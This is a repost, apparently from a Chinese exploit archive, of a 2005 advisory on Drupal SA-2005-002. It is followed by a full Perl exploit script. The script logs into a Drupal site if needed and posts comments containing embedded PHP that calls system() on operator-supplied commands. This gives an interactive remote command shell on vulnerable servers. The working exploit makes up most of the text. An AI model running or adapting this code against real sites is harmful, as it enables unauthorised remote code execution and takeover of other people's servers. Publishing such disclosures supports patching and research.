首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Drupal Code Injection
来源:dab@digitalsec.net 作者:dab 发布时间:2005-07-07  

Drupal Code Injection (SA-2005-002, Exploit)

Summary
A flaw in the input validation routines of Drupal's filter mechanism allows attackers to execute arbitrary PHP code on a target site when public comments or postings are allowed.

Credit:
The information has been provided by dab.

Details
Vulnerable Systems:
* Drupal versions 4.5.0, 4.5.1, 4.5.2, 4.5.3 4.6.0 and 4.6.1

Immune Systems:
* Drupal versions 4.5.4 and 4.6.2

Exploit:
#!/usr/bin/perl
# Mon Jul 4 18:19:35 CEST 2005 dab at digitalsec.net
#
# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)
# Hax0r code here, read before execute
#
# Run without arguments to show the help.
#
# BLINK! BLINK! BLINK! BLINK!
#
# Feel free to port to another stupid script language (mIRC,
# python, TCL or orthers), and send to securiteam (AGAIN)
#
# Theo, this one hasn't been tested in BSD.. yet!
# infohacking: there're a lot of xss in drupal, contact me if you want
# to program some exploits.
#
# BLINK! BLINK! BLINK! BLINK!
#
#
# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE
# contact me for pricing and offerings.
#
# !dSR: yubiiiiii yeooooooooooo
#
use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # ;1 = |$

my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$drupal_user,$drupal_pass);
my $options = GetOptions (
'host=s' => \$host,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'drupal_user=s' => \$drupal_user,
'drupal_pass=s' => \$drupal_pass,
'debug' => \$debug);

&help unless ($host);

while (1){
print "druppy461\$ ";
my $cmd = <STDIN>;
&druppy($cmd);
}
exit (1); # could be replaced with exit(2)

sub druppy {
chomp (my $cmd = shift);
LWP::Debug::level('+') if $debug;

my $ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" }); # this is a random feature
$ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");

if ($drupal_user) { # no need to exploit
my ($mhost, $h);
if ($host =~ /(http:\/\/.*?)\?q=/) {
$mhost = $1;
$h = $mhost . "?q=user/login";
} #some magic hacking here
else {
$host =~ /(.*?)\/.*?\//; $mhost =$1;
$h = $mhost . "/user/login";
}
print $h . "\n" if $debug;
my $req = POST $h,[
'edit[name]' => "$drupal_user",
'edit[pass]' => "$drupal_pass"
]; #grab these, and send to dsr!
print $req->as_string() if $debug;
my $res = $ua->request($req);
print $res->content() if $debug;
if ($res->is_redirect eq 1) {
print "Logged\n" if $debug;
}
}

$ua->proxy(['http'] => $proxy) if $proxy;
my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
my $res = $ua->get("$host");
my $html = $res->content();
my @op; # buffer overflow here
foreach (split(/\n/,$html)) {
if ( m/name="op" value="(.*?)"/){
push(@op,$1);
}
}# xss here

my $ok = 0; # globlal for admin purposes
foreach my $op (@op) {
my $req = POST "$host",[
'edit[subject]' => 'test',
'edit[comment]' =>
"<?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\"); php?>",
'edit[format]' => '2',
'edit[cid]' => "", # drupal is sick.. it doesn't need arguments
'edit[pid]' => "", # they use it to grab some statistycal information
'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal
'op' => "$op"
];

print $req->as_string() if $debug;
my $res = $ua->request($req);
my $html = $res->content();
print $html if $debug;
foreach (split(/\n/,$html)) {
return if $ok gt "1"; # super hack de phrack
if (/BLAH/) { $ok++; next }
print "$_\n" if $ok eq "1"; # /n is for another line in screen
}
}
}

sub help {
print "Syntax: ./$0 <url> [options]\n";
print "\t--drupal_user, --drupal_pass (needed if dont allow anonymous posts)\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "\nExample\n";
print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n";
print "\n";
exit(1);
}

#sub 0day_solaris {
# please put your code here
#}

#EoF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TCP Chat(TCPX) DoS
·Mozilla Firefox and Suite setW
·Internet Download Manager URL
·Mozilla Firefox <= 1.0.4 Se
·Mozilla FireFox <= 1.0.1 GI
·Mozilla Firefox <= 1.0.4 da
·Sudo <= 1.6.8p8 Pathname Va
·PHP XML-RPC Module <= 1.3.0
·phpBB <= 2.0.15 Remote SQL
·FutureSoft TFTP Server 2000 Re
·Xoops <= 2.0.11 XMLRPC Modu
·GNU Mailutils imap4d Remote Pr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved